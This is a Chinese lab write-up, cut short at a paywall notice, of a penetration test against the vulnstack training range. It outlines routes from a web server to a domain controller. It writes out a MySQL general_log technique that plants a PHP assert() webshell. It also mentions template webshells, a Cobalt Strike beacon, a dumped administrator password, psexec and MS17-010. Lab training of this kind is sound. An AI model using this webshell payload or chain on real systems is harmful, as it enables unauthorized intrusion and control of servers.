作者:linshao
靶场下载地址:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
目录
web->内网(两条路线:)
一.php探针->mysql弱口令->目录扫描phpmyadmin->日志写shell
二.目录扫描yxcms.rar->后台弱口令->模板写shell
内网->域控(三条线路:)
一.密码抓取->寻找域控->psexec登录域控->get
二.主机发现->漏洞扫描->域控存在ms17-010->msf代理攻击->get
三.主机发现->端口扫描->redis未授权->getshell->正向上线msf->提权->get
一、web->内网
一.php探针->mysql弱口令->目录扫描phpmyadmin->日志写shell
1.mysql弱口令:主页尝试root/root数据库连接正常

2.目录扫描phpmyadmin:目录扫描存在phpmyadmin

3.日志写shell:
文件导出被禁止

测试一下确实无法导出
select "test" into outfile "C:\\www\\phpstudy\\test.php"

使用日志写shell
//设置日志文件,web绝对路径可以从探针得知
SET GLOBAL general_log_file = "C:\phpStudy\WWW\1.php";set global general_log='on'; //开启日志SELECT '<?php assert($_REQUEST["cmd"]);?>';
4.访问成功:

二.目录扫描yxcms.rar->后台弱口令->模板写shell
1.目录扫描yxcms.rar:


2.登录后台,新建模板

3.访问shell,模板文件位置可在本地搭建环境得知

内网->域控
先上线cs,powershell上线失败,生成exe上线成功


一.密码抓取->寻找域控->psexec登录域控
密码抓取
Administrator/Admin@123
本文详细记录了一次渗透测试过程,从利用PHP探针和弱口令攻破Web服务器,通过目录扫描找到入口,到内网渗透,抓取密码并利用MS17-010漏洞攻击域控,最后通过Redis未授权获取shell并提权。整个流程展示了多种渗透技术和工具的运用。
最低0.47元/天 解锁文章
7514

被折叠的 条评论
为什么被折叠?



